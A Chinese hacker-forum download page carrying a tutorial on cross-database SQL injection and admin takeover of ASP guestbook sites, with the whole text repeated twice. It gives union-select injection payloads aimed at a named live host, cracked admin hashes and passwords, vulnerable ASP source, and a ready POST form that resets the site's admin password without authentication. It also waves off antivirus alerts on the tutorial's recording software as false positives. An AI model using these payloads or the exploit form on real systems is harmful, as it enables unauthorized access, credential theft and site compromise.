 |
 |
[推荐]入侵议题asp实战版 by 小冰
| 授权类型: | 黑客 | 特别说明: |
| 软件分类: | 一天学一点 | |
| 文件大小: | MB | |
| 星级评定: |  |
|
| 发 布 人: | 黑客防线 | |
| 发布时间: | 2009-6-4 1:29:03 | |
| 下载权限: | ||
| 权限说明: | 0 游客;1 普通用户;2 C培训班;3 工具培训班;4 脚本培训班;
5 黑客防线技术团队;6 银牌VIP;7 金牌VIP;8 钻石VIP;
9 铂金VIP;10 管理用户;11 贵宾组;12 核心组;13 顾问组;
15 linux培训班;16 漏洞发掘培训班;17 delphi培训班;
18 java培训班;19 综合实战班;20 vc远控编写班;21 win服务器安全;
22 逆向工程培训班;23 高级xss培训班;24 驱动开发培训班. *无下载权限显示则表示所有注册会员均可下载。 |
|
| 下载次数: | 789 人次 | |
| 下载地址: |
 下载地址1
|
|
怎么说呢,这个教程做的不错,能让大家学会我要考的东西并且教程作者有自己的发散思维
大家好我是小冰 废话不多说 直接开始咯。。
这次的议题幻泉考的是跨库。。。再百度中找了哈资料 发现黑防有资料就看看了。。原为如下:
学会什么是跨库
深入了解acc跨库的利用
学习mssql和mysql的跨库
跨库查询是指在一个服务器的两个数据库之间进行查询,我们只要有一个网站的注入点就可以利用sql语句来进行查询这个服务器中的另一个网站的数据库。但是对于access必须知道绝对路径。
Access数据库
Mssql数据库
Mysql数据库
0<>(select * from 数据库地址.【数据库后缀名,可省略】.表名)
Union select 1,1,1,from 表名 in 数据库地址
Mssql:0<>(select * from 数据库名.数据库用户名. 表名)
Mysql:这个可以直接利用union select 字段,1,1 from 数据库名.表名
测试环境:win2003+iis6+两个asp网站
测试过程:一个网站有注入点。另一个网站没有什么可利用漏洞,可知数据库地址,但是不能下载,利用跨库来查询这个网站的数据。
但是我和风谷跨啊跨。。跨了半天都没有跨成功。。气死我了。。发现是语句的问题 最后还是风谷搞定的。。(*^__^*) 嘻嘻……我只是帮了哈。。说说这次的思路吧。。这次的入侵手法是通过凹丫丫的post的提交注入漏洞得到。耙耙留言板管理的账户和密码。。议题刚出的时候直接被我用投机取巧的方法得到了shell。。(*^__^*) 嘻嘻……至于原因幻泉在论坛已经说了。。。凹丫丫的MD5直接被破解了。。。所以。。。看我的操作吧。。
对了 其实粑粑留言本 有个修改管理密码的漏洞。。前几天听群里朋友说。。今天录制教程的时候看了哈。。搞定。。嘿嘿。。
跨库第一个条件就是要必须知道网站的数据库名 和路径。。。路径幻泉已经告诉我们了。D:\www\16600\ 凹丫丫的数据库肯定不知道滴。。那只有另个数据库咯。。下源码得。
这速度一个慢啊。。
http://16600.900y.net/book2/data/%23baba@%&%yaoyao520.asp 这就是默认是数据库 是存在的。。只是这个服务器是2008的。。所以返回的不一样而已。。2008的安全更上一层。。以后安全的路不好走啊。 (*^__^*) 嘻嘻…… 这样只是为了验证哈。
看看凹丫丫的注入吧。。如果不懂的朋友可以看以前的议题教程去。。
这个就是以前凹丫丫的POST的提交表单。。
a25dd5a2790ccb2e15d3ef54f3b0ad9a admin 这个就是注入得到的用户名和密码。
查询结果:
123passshiwo
MD5查询这站太强大了。。这样进后台就没什么好说的了。。老方法了。。我们来看看跨库查询吧。
D:\www\16600\book2\data\#baba@%&%yaoyao520.asp这个就是留言板的数据库地址咯。我们去看看语句是怎么写的。
304f99e3bfe90bd6 admin 13
这次就是得到的留言板的MD5 和管理密码。。
密码是xiaobing 这个密码是我后来改的。。开始的那个密码很BT无法被破解。。
union select 1,password,3,4,5,6,7,8,9,10,11,admin,13,14,15,16,17,18,19,20 from [D:\www\16600\book2\data\#baba@%&%yaoyao520.asp].admin
这个就是语句的写法。。我们对比下上面黑防找到的那个语句。。
Union select 1,1,1,from 表名 in 数据库地址
大家知道了吧。。
我们现在就看看如何直接修改留言板的密码。。
出现漏洞的文件:admin_post.asp
我们看看源代码。
<%
''''''''''''''''''管理员密码修改''''''''''''''''''''
if request.QueryString("action")="password_edit" then
admin=request("admin")
password=request("password")
password2=request("password2")
if password<>password2 then
response.Write("<script>alert('两次密码输入不一致,请返回重新输入!');history.back()</script>")
end if
if admin="" then
response.Write("<script>alert('请输入新用户名!');history.back()</script>")
end if
if password="" then
response.Write("<script>alert('请输入密码!');history.back()</script>")
end if
set rs=server.createobject("adodb.recordset")
sql="select * from admin "
rs.open sql,conn,1,3
rs("admin")=admin
rs("password")=md5(password)
session("password") = false
session("adminname") = ""
rs.update
rs.close
set rs=nothing
conn.close
set conn=nothing
Response.write ("<script>alert('修改成功!请重新登录!');window.location='index.asp';</script>")
end if
%>
这个我也不到多做什么解释。。大家不懂的就来问哈我吧。。利用的方法就是本地搭建个POST提交表单。。就OK了。。。大家看操作。
<div id="submit">
<form action="http://16600.900y.net/book2/admin_post.asp?action=password_edit" method="post" name="form1" id="form1" onsubmit="return FrontPage_Form1_Validator(this)">
<div id="submit_div">
<label for="admin">管理帐号:</label>
<input name="admin" type="text" id="admin" value="admin" />
<br />
<label for="password">管理密码:</label>
<input name="password" type="password" id="password" />
<br />
<label for="password">确认密码:</label>
<input name="password2" type="password" id="password2" />
<br />
<input type="submit" id="sbutton" value="确 定" />
<br />
<input name="action" type="hidden" value="adminlogin"/>
</div>
</form>
</div>
</div>
</body>
</html>
这个就是本地搭建的一个提交表单。。嘿嘿 。。其实也就是直接保存下来的。。
看看效果。
这就是效果。。
我们试试密码吧。。密码被我改成默认的admin888了。。
欢迎你,admin
我们来看看跨库查询出的MD5吧。。 OK了吧。。进入后台拿shell我就不演示了。。都是些老方法了。。
教程就到这里吧。。有不懂的大家联系我吧 QQ:81612543
对了 还有点。。这个视频录制软件 有的杀软报毒。。我感觉是误报。。大家如果担心的话 就在虚拟机上观看吧。。
如果有哪位朋友可以帮忙看看这录制软件 也联系我咯。。 谢谢大家的观看。。拜拜。。
[D:\www\16600\book2\data\#baba@%&%yaoyao520.asp].[color=Red][/color]
大家好我是小冰 废话不多说 直接开始咯。。
这次的议题幻泉考的是跨库。。。再百度中找了哈资料 发现黑防有资料就看看了。。原为如下:
学会什么是跨库
深入了解acc跨库的利用
学习mssql和mysql的跨库
跨库查询是指在一个服务器的两个数据库之间进行查询,我们只要有一个网站的注入点就可以利用sql语句来进行查询这个服务器中的另一个网站的数据库。但是对于access必须知道绝对路径。
Access数据库
Mssql数据库
Mysql数据库
0<>(select * from 数据库地址.【数据库后缀名,可省略】.表名)
Union select 1,1,1,from 表名 in 数据库地址
Mssql:0<>(select * from 数据库名.数据库用户名. 表名)
Mysql:这个可以直接利用union select 字段,1,1 from 数据库名.表名
测试环境:win2003+iis6+两个asp网站
测试过程:一个网站有注入点。另一个网站没有什么可利用漏洞,可知数据库地址,但是不能下载,利用跨库来查询这个网站的数据。
但是我和风谷跨啊跨。。跨了半天都没有跨成功。。气死我了。。发现是语句的问题 最后还是风谷搞定的。。(*^__^*) 嘻嘻……我只是帮了哈。。说说这次的思路吧。。这次的入侵手法是通过凹丫丫的post的提交注入漏洞得到。耙耙留言板管理的账户和密码。。议题刚出的时候直接被我用投机取巧的方法得到了shell。。(*^__^*) 嘻嘻……至于原因幻泉在论坛已经说了。。。凹丫丫的MD5直接被破解了。。。所以。。。看我的操作吧。。
对了 其实粑粑留言本 有个修改管理密码的漏洞。。前几天听群里朋友说。。今天录制教程的时候看了哈。。搞定。。嘿嘿。。
跨库第一个条件就是要必须知道网站的数据库名 和路径。。。路径幻泉已经告诉我们了。D:\www\16600\ 凹丫丫的数据库肯定不知道滴。。那只有另个数据库咯。。下源码得。
这速度一个慢啊。。
http://16600.900y.net/book2/data/%23baba@%&%yaoyao520.asp 这就是默认是数据库 是存在的。。只是这个服务器是2008的。。所以返回的不一样而已。。2008的安全更上一层。。以后安全的路不好走啊。 (*^__^*) 嘻嘻…… 这样只是为了验证哈。 看看凹丫丫的注入吧。。如果不懂的朋友可以看以前的议题教程去。。
这个就是以前凹丫丫的POST的提交表单。。
a25dd5a2790ccb2e15d3ef54f3b0ad9a admin 这个就是注入得到的用户名和密码。
查询结果:
123passshiwo
MD5查询这站太强大了。。这样进后台就没什么好说的了。。老方法了。。我们来看看跨库查询吧。
D:\www\16600\book2\data\#baba@%&%yaoyao520.asp这个就是留言板的数据库地址咯。我们去看看语句是怎么写的。
304f99e3bfe90bd6 admin 13
这次就是得到的留言板的MD5 和管理密码。。
密码是xiaobing 这个密码是我后来改的。。开始的那个密码很BT无法被破解。。
union select 1,password,3,4,5,6,7,8,9,10,11,admin,13,14,15,16,17,18,19,20 from [D:\www\16600\book2\data\#baba@%&%yaoyao520.asp].admin
这个就是语句的写法。。我们对比下上面黑防找到的那个语句。。
Union select 1,1,1,from 表名 in 数据库地址
大家知道了吧。。
我们现在就看看如何直接修改留言板的密码。。
出现漏洞的文件:admin_post.asp
我们看看源代码。
<%
''''''''''''''''''管理员密码修改''''''''''''''''''''
if request.QueryString("action")="password_edit" then
admin=request("admin")
password=request("password")
password2=request("password2")
if password<>password2 then
response.Write("<script>alert('两次密码输入不一致,请返回重新输入!');history.back()</script>")
end if
if admin="" then
response.Write("<script>alert('请输入新用户名!');history.back()</script>")
end if
if password="" then
response.Write("<script>alert('请输入密码!');history.back()</script>")
end if
set rs=server.createobject("adodb.recordset")
sql="select * from admin "
rs.open sql,conn,1,3
rs("admin")=admin
rs("password")=md5(password)
session("password") = false
session("adminname") = ""
rs.update
rs.close
set rs=nothing
conn.close
set conn=nothing
Response.write ("<script>alert('修改成功!请重新登录!');window.location='index.asp';</script>")
end if
%>
这个我也不到多做什么解释。。大家不懂的就来问哈我吧。。利用的方法就是本地搭建个POST提交表单。。就OK了。。。大家看操作。
<div id="submit">
<form action="http://16600.900y.net/book2/admin_post.asp?action=password_edit" method="post" name="form1" id="form1" onsubmit="return FrontPage_Form1_Validator(this)">
<div id="submit_div">
<label for="admin">管理帐号:</label>
<input name="admin" type="text" id="admin" value="admin" />
<br />
<label for="password">管理密码:</label>
<input name="password" type="password" id="password" />
<br />
<label for="password">确认密码:</label>
<input name="password2" type="password" id="password2" />
<br />
<input type="submit" id="sbutton" value="确 定" />
<br />
<input name="action" type="hidden" value="adminlogin"/>
</div>
</form>
</div>
</div>
</body>
</html>
这个就是本地搭建的一个提交表单。。嘿嘿 。。其实也就是直接保存下来的。。
看看效果。
这就是效果。。
我们试试密码吧。。密码被我改成默认的admin888了。。
欢迎你,admin
我们来看看跨库查询出的MD5吧。。 OK了吧。。进入后台拿shell我就不演示了。。都是些老方法了。。
教程就到这里吧。。有不懂的大家联系我吧 QQ:81612543
对了 还有点。。这个视频录制软件 有的杀软报毒。。我感觉是误报。。大家如果担心的话 就在虚拟机上观看吧。。
如果有哪位朋友可以帮忙看看这录制软件 也联系我咯。。 谢谢大家的观看。。拜拜。。
[D:\www\16600\book2\data\#baba@%&%yaoyao520.asp].[color=Red][/color]
相关黑客软件
